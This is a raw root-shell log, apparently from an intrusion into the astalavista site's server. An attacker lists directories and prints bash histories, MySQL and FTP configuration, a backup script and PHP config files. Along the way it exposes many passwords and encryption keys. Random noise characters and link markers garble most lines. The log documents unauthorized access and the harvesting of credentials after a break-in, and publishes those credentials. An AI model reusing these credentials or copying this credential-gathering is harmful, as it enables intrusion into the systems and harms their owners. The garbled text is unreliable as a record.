9 q$ R7 s. z/ R3 l7 \0 Q$ Ksh-3.2# cat /etc/motd
3 i& a: m8 S/ q#####################################################. P& m0 o1 R2 e) l6 b, G
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #0 w- y3 L( t8 B0 Z0 X
# |__| [__ | |__| | |__| | | | [__ | |__| #
% O+ m; N' M8 Z# n m% y0 d# | | ___] | | | |___ | | \/ | ___] | | | #- Q3 `2 @3 \1 W/ N" E9 y& R
# #& v# _% [( @/ l% V- z: ~/ h5 W
#####################################################
Y X1 O8 U \4 z% i; M# #' K+ }3 L# T# B% y* x! {2 d$ _
# Admin Contact - 链接标记support@secureservertech.com #
3 t# O2 w6 P+ t# k1 m: d# #
4 w' o7 ?; H/ Q& b! N3 x5 @: }- Z# Available ShortCuts #
9 b; K+ |- \$ H0 @# #, ?' V. u1 A9 J' @: F
# nst - list active connections # M( O% W; ?2 v
# ddos - shows how many times each ip is connected #( s D% O; |+ e' l; [- r
# ltr - restart the webserver #0 L0 t% r' p' ]
# phpc - edit the php config file #
4 _+ P. w5 g# M- o7 \3 G) R# htc - edit the webserver configuration file #
5 V3 S( |' J' U Q! ?# up - uptime #
* v9 n; A$ `% A; U# etd - edit the motd of the day file #
- e$ N+ I3 e5 k! _# htr - start and restart apache if needed #7 Y1 ~0 g9 Y' D+ X; l# `
# syng - shows active SYN_RECV connections #
0 ]; _8 c8 j3 i1 p& |9 g# synd - syn flood blocker - “synd -h” for usage #
; o" K |9 G3 Y5 C5 ]) C#####################################################6 y. J4 ~/ O5 m- n, l( c. D
# NOTES: #
& G0 H' ^$ E3 _( m0 i# Last Upgrade - 12-08-2008 by JF #
' U* d% D1 i. d, o( T6 F# My.cnf/Mysql Optimization - 1-28-09 #
9 z7 n+ z) R% F$ B) d, V# # L B4 a$ n9 m
# #/ O9 a6 z% v6 P4 C, z
# #
/ t- x9 b' u& W Z& a& W6 m. P#####################################################+ g4 G: \5 k4 H6 \' A
# E, K8 T2 P$ c5 s. r7 psh-3.2# lastlog | grep -v Never
! @# F! `; G# z. |' L+ Z/ \Username Port From Latest3 v$ I/ t+ k1 X7 T5 |# N- D& L1 G; {
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009" E# G$ g* P r& _" d
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008! G6 } b# v$ w- @" K
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
* P: w) c/ C2 }; L7 U) Qastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
& A- T; [' n! }. e1 p$ Z; D
- A( ^2 b0 j3 l1 K5 X, {sh-3.2# ls -la
/ Z+ ?, A. S* m1 C( Rtotal 453376
, K! x6 P( J' \; [drwxr-x— 15 root root 4096 Jun 4 08:40 .' O+ f4 A$ y8 r7 y) _6 b! \) H
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
' B- d$ N. B, r-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
% D {# t9 Q6 H0 _8 S-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg; ]/ r0 S- E+ d, D
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history* ~+ O8 d! {& v) K" O
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
" V9 [1 C: u Q( b-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile5 D7 o7 n$ ]6 }; l) G
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
; u) q o, M/ x& ~* k-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
2 a) s4 r3 Q) t# Y5 Y3 }) [$ I" j4 B" X, N-rw-r–r– 1 root root 1327 Nov 29 2007 cert0 l" ]' L3 y) F3 c9 ^5 m
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
& Z6 A6 S+ i7 e# n* {8 _2 ]drwxr-xr-x 4 root root 4096 May 20 2008 .cpan! s6 j3 s4 d7 k* p& A1 e
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
1 R& l! i2 z* q-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
# C5 a: R G# ^8 ?# _drwx—— 2 root root 4096 Oct 28 2007 .elinks# L1 u" ~# Y% o5 U6 ]( |
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1+ {1 Q3 m) l/ Y- }0 x! t
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2& \$ e V- f( K5 T
-rw——- 1 root root 0 Apr 16 13:19 .history: T( d+ V+ o' _8 r2 ?/ D
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log0 d" ~% l! \6 @ O/ i& N0 p
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog5 K( j* x) l9 z& _1 d5 w) ^
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
" ^" _: Y$ R, w0 d- t7 M-rw——- 1 root root 35 Jun 2 14:23 .lesshst* p1 L' G; h/ A, x/ O; o
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp% l! ]6 o3 L# c! k3 ~5 [- |
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
7 W+ K( B+ c0 g; g, [" F% s-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz) M+ A5 I/ L1 t' P# y" b- W E l5 |
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
. X0 G: f+ [4 n" o1 j0 N- `- [-rwx—— 1 root root 760 Sep 18 2008 lp/ t" h- m \4 t* l* C
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
6 l& j) _1 n* f, j8 H9 N+ x3 i-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
: C5 m. w5 c( r-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
; c) t$ y2 V, H+ A5 f* ~1 b# @; Tdrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
h; P8 _+ T2 U: r! ^9 N4 \% p* }-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
- l, O9 l4 T0 `' @drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.35 i4 x( v- ~( |. ~
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz. n! b' l- D( f; B& U0 E
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
% H( ?; M4 y A7 T R6 a: [-rw——- 1 root root 41 Oct 19 2007 .my.cnf, o4 e% I( K8 w% S) T7 J# _
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history" f! X2 o4 }& i( Q
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
& y1 a, ]5 T) c# J" N' k-rw——- 1 root root 41 May 20 2008 .mytop
1 Z0 Y8 n; V) [drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
4 S$ U5 G, V# d; M-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz) [/ B" u; ~' C |- V# V" v/ }, l& W
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
# Y& b9 q0 }) x0 G-rw——- 1 root root 1462 Sep 21 2007 opt.php* c0 C# o# E/ d2 Y W" l
-rw-r–r– 1 root root 3371 Sep 22 2007 p, t. r/ q. x( X* D: E) q6 e
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2% N. R/ f6 b- b' Z7 `
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
' i4 ~+ H" @2 R& l/ e( |6 K2 p-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
# W3 F* F! h( M1 W; b1 p0 ~-rw-r–r– 1 root root 887 Nov 28 2007 server.key1 I5 X" w) S. B7 Z9 R8 D5 e
drwx—— 2 root root 4096 Oct 10 2008 .ssh
8 O6 H& l4 b" b A4 x-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat$ d! A. Z6 M* E/ `% g: y
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc1 F; Y9 u0 p- Q a) S3 W! ^8 m
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
3 ~3 ]7 j( w+ d5 p-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
2 b$ z* p3 U. z+ F. O% Q5 ydrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
; Y+ A) u0 S" p- n" }-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh: x' H! c5 V" A* H8 j* h
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
- h0 d8 e& F* p& V! U2 k1 e-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2. _5 _% W* F" b% e8 {" K
-rw——- 1 root root 12997 May 16 2008 .viminfo$ H- V/ A2 c/ b; A: O
# o. @4 M9 Y q, L) b3 z0 p
sh-3.2# cat .bash_history
8 q, F! X' h$ q- | l/ m[snip]
/ l( C/ I1 V; E; w) t% iwget cp4sst.com/sstlinux.tar.gz
) }: f" i) M) Z# Etar zxvf sstlinux.tar.gz ^7 E# n: k$ I) |% M
cd linux-2.6.27.10
6 g B; W) s4 Z9 o& ]* hsh install.sh
6 B U+ C! \" _7 o* { ?make bzImage ; make modules ; make modules_install ; make install
* E6 Q$ C, d: E8 `. q' dmake clean) C8 j% b/ p% k
service mysqld restart
0 S$ X3 @5 T+ r3 g, g" X[snip]
& F6 u& p/ j! N- \! I% x* v+ B! Hcd /usr/sbin/
' n1 x2 E& \4 S1 _4 ?2 b' ?chmod 4777 traceroute3 b( a6 E+ c, R& J' e3 h# `
chmod 4777 ping
" @5 r9 U D& t7 }* ktraceroute -I 链接标记[url]www.astalavista.ch[/url]
/ I5 ~7 o# O7 t7 X[snip]
/ j/ B7 K7 {2 c% o) hvi /etc/csf/csf.conf
' y& @/ V. g9 g: b# r( L3 o$ _traceroute google.ch
: B% X1 G% [( n; L1 k, pservice csf restart
9 M2 Q+ w- ^, L, P7 j6 htracert google.ch/ H' X4 P9 u+ \/ I8 x7 X
service csf restart9 J8 i j+ Z. ]! t& s3 \
traceroute 链接标记[url]www.google.ch[/url]
2 p, }* \$ s9 m8 e4 ^7 E3 etracert 链接标记[url]www.google.ch[/url]
4 s( w6 b0 V4 t/ h8 Xtraceroute 链接标记[url]www.google.ch[/url]% D8 v" w7 K4 b6 ]+ B5 e
locate traceroute0 Y! s; C( l5 }8 f6 ^
chown 4755 /bin/traceroute: D4 y0 i: F: C
chown 4777 /bin/traceroute
1 O+ _6 G8 d4 v3 Q, zlocate ping
3 }8 B* x& a" S3 o* F! Pchown 4755 /bin/ping0 A# s. U. b$ y% u: c) H: B, e
chown 4777 /bin/ping. r- j2 ]' A! |! G' k5 W( y
cd /bin/* a) a& k* L. S- y
ls -ali | grep ping% ?2 s; y" @: `( I# l
chown root ping
9 }7 K. K" ]" [ nchmod 4755 ping
* O d& \7 P& J! ols -ali | grep traceroute
& ^9 k- E: o6 b n' E$ Ichown root traceroute
, b2 u( S4 _$ h n( |chmod 4755 traceroute+ `# y* G9 z* x+ D
ls -ali | grep traceroute
5 K. ?5 [, @7 }* W# d+ Ktraceroute -I 链接标记[url]www.google.ch[/url]
4 j* k1 t) Y; Q4 i# ~1 Otraceroute 链接标记[url]www.google.ch[/url]
6 J9 M% C9 L3 q3 M% f, dwhois pmsantos.ch
& h' z, l1 J' o% L. s[snip]
6 t$ N- ` ]3 j/ _mysql -h com_contrexx2_live < /root/defaultp_ports.sql C4 X2 h' C: x* {3 ~- \
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql' R; \1 D F7 w$ y7 h- h9 p
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql' O/ g% x! @/ i C( i
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql0 j. ?6 E" f0 M, H' G1 h0 `' H
top2 |0 R% T( K( v D+ `1 l+ S
ping ssth.ch( }- E' }; k7 s8 Y0 z R
ping asdlkfaljgasd???ljg???lasj.ch6 t7 a. f+ }( ^- C+ K, N
ping asdlkfaljgasdlasj.ch
, m/ s, E0 X1 ~3 z; Z8 Zping 链接标记[url]www.ssth.ch[/url]
% K0 i- y; |) {5 |. i7 Xping ssth.ch0 A, D: q$ x! w9 I# N4 v/ l. ?
nslookup 链接标记[url]www.google.ch[/url]
. x$ h. ^; y M* Z6 Gnslookup 链接标记[url]www.ssth.ch[/url]
* _" z3 _8 a% pman nslookup- O0 h3 U L' F. ]! R, e
ping 链接标记[url]www.google.ch[/url]" P+ w- S G; \5 X9 Z
nslookup 链接标记[url]www.google.ch[/url]* U/ P3 o/ q# ^% H+ q
nslookup 链接标记[url]www.google.ch[/url]
) X2 D3 q3 l2 m5 F: |! l+ snslookup salfjasdlf.ch( A3 V) h) M/ W, J
[snip]5 l. b7 L! O# A4 ^0 c3 K
openssl passwd -1 sadf9 F6 E; j. V0 @7 ~- f4 J1 q
openssl passwd -1 5cZNHstdTy
2 D! u# b( ?3 jmysql
1 o) j0 l7 N2 [( P0 w R( Hmysql
8 g0 b! ^# |) F, p5 Klocate proftp
6 W; R4 b7 G6 D3 P9 e3 Y: y. rvi /etc/proftpd.passwd: m5 _$ ^6 t3 W0 K6 [9 {3 ^
service proftpd restart* [' K% q6 ^& R* i
locate proftpd.conf
& p }2 n' a y3 @9 Nvi /etc/proftpd.conf; B4 h2 S8 b6 { e6 E! B
vi /etc/proftpd.passwd6 \& ~, N$ A X1 ?' F* M( A2 ~
service proftpd restart9 @: |" i L$ q" ~ E
[snip]. x" ]4 F' b) q
/bin/sh /home/com/backup_system/backup.sh, M+ R4 I: }0 m
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
$ \* e" R: t: r% \mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql8 {' U- }9 k' o! x* d4 Q
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
1 a- w4 T' ?, v* q$ }ls -ali
' _" w2 g( Q7 d$ F# |; P& l6 [mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql( z% ?1 o( j+ l7 T% o
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
( C% m1 P8 y( u Y Dcrontab -l
! w! p, o0 y& O: ~6 y8 G/ }/ K# Gcrontab -l; ^/ i+ C4 d% a6 Q1 |' Q5 q8 J
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
' q* b$ O2 N U; n$ _ r5 x/home/com/public_html/modifications/cronjobs/exploits.sh
- V5 b7 W* w9 g; X/ p2 Owget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]5 ?3 c* y* F" i; r* k
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz/ f7 S' ~0 g: I* G$ Z1 D, K
cd lsws-4.0.30 }+ e( S& { i7 S
sh install.sh
5 B+ z3 a* }. t6 _uptime' U, N* n9 f; V9 N
hdparm -tt /dev/sda
( f$ }. D7 s% N% l6 Q5 y' x. @iostat
3 C/ f( a5 C& ?: w* {* gyum install iostat2 m6 J# f$ S5 P
iostat) o' k- F8 |/ T' z5 Q2 w8 V) F
whereis iostat+ \0 i4 V' M+ \( v
yjm clean all
$ r9 n' J* C. x$ |' m; ^# O, n; y" Myum clean all ; yum -y update
2 q z! n$ j( C& `8 Yiostat% P) S3 D- D+ I7 |
yum install systat
7 s. p9 Y! Q5 C( @; n9 f$ erpm -qa | grep iostat* J7 A8 U L+ a* |; V
rpm -qa | grep sysstat
# e9 L8 f1 h$ L% F& Trpm -qa | grep systat
7 i# B" M" X; ^% B, |# |dmesg -c- T5 B/ D2 a7 C4 N
sysctl -p6 q7 ?# c6 `: O# z2 f) R
uname -r( L# n$ S. g. }! h7 j
cd /usr/src
$ D) Y4 u9 {+ w# o4 y) t, Owget nix101.com/kernels/sstlinux.tar.gz
4 X0 W* r, z0 L- |0 rshutdown -r now
s! o) M$ s6 I1 Hnano -w /boot/grub/grub.conf
T2 e$ g! t5 q% `' T2 r- ^' J4 w
sh-3.2# cat .my.cnf
! \3 m* I; R8 y. [4 X8 j[client]
* v* \1 [& |- X! h$ V" fuser=da_admin
6 Q: [/ i7 f/ w( Y) v& D; xpassword=X9dctmRH
( l+ r7 T- O; a, h4 Z8 I' k2 V& d9 O
! {: s( G/ w' \* d1 y% F5 M) ^8 b& ssh-3.2# cat /home/com/backup_system/backup.sh. h, f$ n2 Q' T @8 C
#!/bin/sh
2 \# C r$ P" c( P0 O* s#####################################################################& g7 O+ m; M k& V/ t: y
# #' v' a& h3 x9 Q3 V; g/ @! a
# incremental backup for astalavista.com #
" t! {/ e& }" E) y' n- [) Z# #
: S. Z' E7 h+ R! Y! I8 a# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
0 i4 ?& `$ |- s+ l$ D4 e' _% }# #: }, M& G) u. i$ A
#####################################################################7 ?1 H8 Z2 O/ d
[snip]
$ d ^9 w: l0 |2 f* Q; APROG_DIR=”/home/com/backup_system”;
7 W) Q& Y, w, F9 ]* }BACKUP_DIR=”/home/com/backups”;
' J7 X# N1 I/ l: a6 Z+ D: A& j cDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;# _0 q/ |, @* `: K5 }
# ftp for synology backup server
' Y- o+ A1 D( f1 gFTP_HOST=”212.254.194.163″;- U& V% p# R! M) y2 u
FTP_PORT=”21″;% b. `) R- T& K3 [- q) ?1 {
FTP_USER=”astalavista.com”;6 w0 N& P. y- o: S
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;7 x( T( w6 W5 C% k( G0 c3 f3 t
FTP_DIR=”/astalavista.com”;
# M+ _& A3 F9 `0 X. x$ [# database( {& ~# F: r, V
DB_HOST=”localhost”;" C8 g9 @) d B" G1 ^0 A
DB_USER=”contrexxuser2″;$ N0 g7 I; t2 K" b/ H% n# T. P! e
DB_PASS=”0fEYNZgXz1pKe”;& i! Y( X" Q0 H& ^6 z+ T
DB_DATABASE1=”com_contrexx2_live”;* }/ I _# T+ K" {- {
DB_DATABASE2=”com_contrexx2″;) r# g& `$ R( k7 k( f& X
[snip]
Z8 W3 w8 d4 U( K/ T: rftp -in $FTP_HOST $FTP_PORT <<EOF
; ?" Z6 y& Z4 V2 L1 bquote USER $FTP_USER
9 O8 q2 H$ b0 q9 x$ {0 Aquote PASS $FTP_PASS
. b( i9 n8 [) }% k' [ dcd $FTP_DIR
! U( l4 Z0 q! N% y" S7 Fput $DB_FULLNAME-SQL_Dump.tar
# z" w' L3 F, j$ q e: ~* w' Hput $BACKUP_FULLNAME-Public_HTML.tar
7 t' E3 Z5 m2 g9 \close) J% n+ }9 g6 I* X
bye6 m) C6 F! K9 e$ J% E9 I4 s
EOF. W1 o/ D- \' C
$ K, J; V ~6 W9 M6 ~! }sh-3.2# cd /home
) y e: o' f2 B U- @& O. Msh-3.2# ls -la9 H8 k0 | V/ N( U8 ~, p3 I
total 120
7 a+ z' ^5 |; y( E7 z- ^( Rdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
0 P; ?7 n5 r& {drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
& K: K) u. v' Adrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
3 s3 i/ Z" M Y: I; L-rw——- 1 root root 8192 Jun 4 03:03 aquota.group4 o6 r4 z) }) ?, R7 N
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user# Z0 [/ L" w: f2 z
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet5 \* p- q$ Y d3 v
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
# g; l$ \" w3 {9 g. t5 \+ j; r# Qdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
1 a4 S5 b: t4 r' P+ l* x8 v& r1 ydrwx–x–x 10 com com 4096 Apr 28 12:40 com; E% X( @, y6 E8 T$ Y9 _
drwxr-xr-x 2 root root 4096 May 17 2007 ftp; Z m* _ f- K: q
drwx—— 3 jon jon 4096 Sep 21 2007 jon6 x% d' z! B+ ~0 y3 e
drwx—— 2 root root 16384 Sep 11 2007 lost+found
- b: I# j: d. ?, rdrwxr-xr-x 2 root root 4096 Sep 14 2007 my+ p; j6 a# U0 c; {$ ]3 x9 X
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
7 q7 H- m, p! D$ s, wdrwx—— 2 jon jon 4096 Sep 15 2007 test
$ b. [/ _( x& A" |drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
0 v# `6 C# o! U8 G8 j/ Y6 N) }( y8 ]# R. H2 u
sh-3.2# cd admin% m& r k9 s _5 L
sh-3.2# ls -la- }7 t# {+ B3 ~% `1 `, P7 r: T: W
total 17358965 k/ X3 d* r" E/ z# G; A$ w T
drwx–x–x 9 admin admin 4096 Nov 28 2007 .) s7 x/ k# m3 ]0 v1 C; [8 n
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
U& Y0 |0 Y* P4 E6 pdrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups5 {& Y( u( g0 y
drwx—— 2 admin admin 4096 Sep 28 2007 backups- X; i) O3 }+ i8 \
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history4 H; u5 ]1 ~* O3 s7 A
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout4 I" C4 X- N% }# k* K! | ~2 n: ?0 N
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
. Y+ ]$ z) s; O( H7 u-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
0 h0 `( k a8 d* Gdrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
% e! P, ~+ V; x, [$ I& Zdrwx–x–x 6 admin admin 4096 Sep 21 2007 domains
' A" a/ |/ G& }drwxrwx— 3 admin mail 4096 Sep 21 2007 imap
7 B8 R5 X6 j% q) T$ u-rw-r–r– 1 root root 24 Sep 21 2007 info.php
" S' g0 j2 o& y7 ~+ L- c5 r+ adrwx—— 2 admin admin 4096 Sep 21 2007 mail' `6 h {$ v! a6 t+ F; S
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
$ K& @; @9 Z4 x @9 Z-rw-r–r– 1 root root 887 Nov 28 2007 server.key0 @5 H9 v, M, g; {# U0 x" `
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow+ Y/ n. `8 K& Z" m9 f
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
: o h& V0 F% x+ a0 S; S* adrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups4 y. O/ B' n- A! V6 \
P+ E" d$ g1 \" \
sh-3.2# ..2 D0 D; I+ T; q; ~( G8 d
sh-3.2# cd jon; K6 ^. g1 l3 p) D9 u! T1 h$ d
sh-3.2# ls -la
4 b; L8 o- A$ z$ htotal 36
; p0 t1 R) A3 @4 udrwx—— 3 jon jon 4096 Sep 21 2007 .
! H2 g% E! o& k* sdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
' W# y* b+ g8 {% Y* G2 `-rw——- 1 jon jon 53 Sep 21 2007 .bash_history h- w/ R! g( p# |/ O; u/ u& f, n5 N
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
, n( { c, Y/ I% }-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
" b- C/ t% m( I, m-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc6 X. Y! D5 t9 R# `$ N
-rw-r–r– 1 root root 24 Sep 21 2007 info.php2 p: @( C& E! g: z' p
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html- }) R- w) `6 O$ m" Z% Y
7 v% [, f7 C) X" m8 t5 W3 |6 ?sh-3.2# cd ..
: @3 e2 E# g* C5 p6 d, osh-3.2# cd test9 s8 J q5 y+ s: z
sh-3.2# ls -la
( b- T9 Q6 s' A5 i) z8 Q T4 Ptotal 48' f; t- @3 q" R* b
drwx—— 2 jon jon 4096 Sep 15 2007 .4 O0 ]3 j, M0 v; `. \0 a2 r
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
8 O$ ^( _5 h$ S$ i-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
6 m, O3 z9 W1 p7 t9 B-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
% r' {. h) V2 U. X% n-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile) l% Q, J5 Q" ?" Z9 n
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc" F, {( i/ e% `% @
sh-3.2# cat .bash_history
5 P: q4 }7 y3 M3 @4 `/usr/bin/mysqladmin -u root password PoliuJhytg67
6 l' m4 y+ {" O! y+ X3 g6 e; |% I4 |! }0 V% I9 S! E* y
sh-3.2# cd ..7 U0 a8 H$ S; J
sh-3.2# cd astanet5 j* Q3 }. F1 T }4 t
sh-3.2# ls -la0 ^& S8 `' r' l4 b' g9 m
total 52! L( ]! K2 ~8 b& ~* r. B$ j
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
, t7 h" b+ D. k- K& m+ Idrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..! q$ E" e' e, ^3 u4 W
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
7 C) [: _% [6 S-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history! R2 D/ f# V0 [! B! ]; U
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout o; S* o: Z3 A3 ~ i2 x
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile! L) \7 ^" U7 \( g2 C
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
3 f# f( y" ~, K* I% O# p3 Udrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains4 G/ e' _) C. ~
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap7 i$ }2 Z" H2 _! W+ Z# d
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail8 C$ H( f2 |1 e. w D1 }
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history1 \* t) p8 \$ ?$ h: Z
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html# i1 W8 z) o2 N9 I$ f. a
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow3 ]! f) N, y% b
: R* ]. W& C6 k( Q, @2 X" q% Bsh-3.2# cd auth/
" A! r E; B1 v4 Ash-3.2# ls -la8 g5 v8 n) G4 ]# ]6 e6 b
total 28& n- I8 b1 u; P. H& O
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .4 c; ?( p8 l* b
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..* Q) g7 b9 A Z! K, y: \
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
% f" V7 a8 [0 g$ g: }: x- q-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php# ^ ~: [* q& A- x- I, o, L9 ]
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd/ ~; b/ S8 `& V, r$ J' b( q
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
6 y* K: q7 O5 X1 Y: }& N-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd9 k C) m; q. a8 w7 x
" ?$ x4 f1 }: h0 n' @sh-3.2# cat hackercontest.config.inc.php) C0 `" b% p1 K
<?PHP
- V( P- t1 i' A. J. a! L% b& P* w// Variabeln f?r Verbindung zur Datenbank //
+ X& X; P- C( _( X p) ?* |+ X$conxHost = ‘localhost’; // MySQL hostname0 O, N) `+ b, }+ ?
$conxUser = ‘hackercontest’; // MySQL user
) e* T! N$ d% n2 A4 X# T: v* Y$conxPassword = ‘K6m@7dUc’; // MySQL password
1 u5 Z8 ]: X0 _# R( I$ a9 A7 j$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish, _$ f. ^' C5 @% a
?>3 L6 ]0 F" G- n3 t
sh-3.2# cat hosting.config.inc.php0 Y% ^7 m4 w, a2 R! G# V4 c5 T
<?PHP
5 c7 J9 Y5 B' q1 G# Y// Variabeln f?r Verbindung zur Datenbank //
, U5 s! J, f0 L& h$conxHost = ‘localhost’; // MySQL hostname
; @/ x# R4 E$ O n6 k2 s7 H$conxUser = ‘hostinguser’; // MySQL user
/ s; Q) b; ~3 f; @) B; V$conxPassword = ‘cXvB3981′; // MySQL password
$ J8 S9 B, r$ I5 G& S' q' A/ L$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish+ V. p; H- v8 j C4 Y
?>: Z) M1 _; S+ U' K' M0 s
' l4 i: H6 @; N3 _, \
sh-3.2# cd ..
) L$ x y% r! n' `sh-3.2# cd com
G- W! B* E+ Nsh-3.2# ls -la6 k1 D& L& t+ u( D
total 141208* i$ F( \8 H" R/ d5 v( V
drwx–x–x 10 com com 4096 Apr 28 12:40 .2 r- e! T; M/ _8 a6 w& G& F
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..- Q" ]( A3 o+ r5 _& i5 M
drwx—— 2 com com 4096 Jun 4 04:04 backups
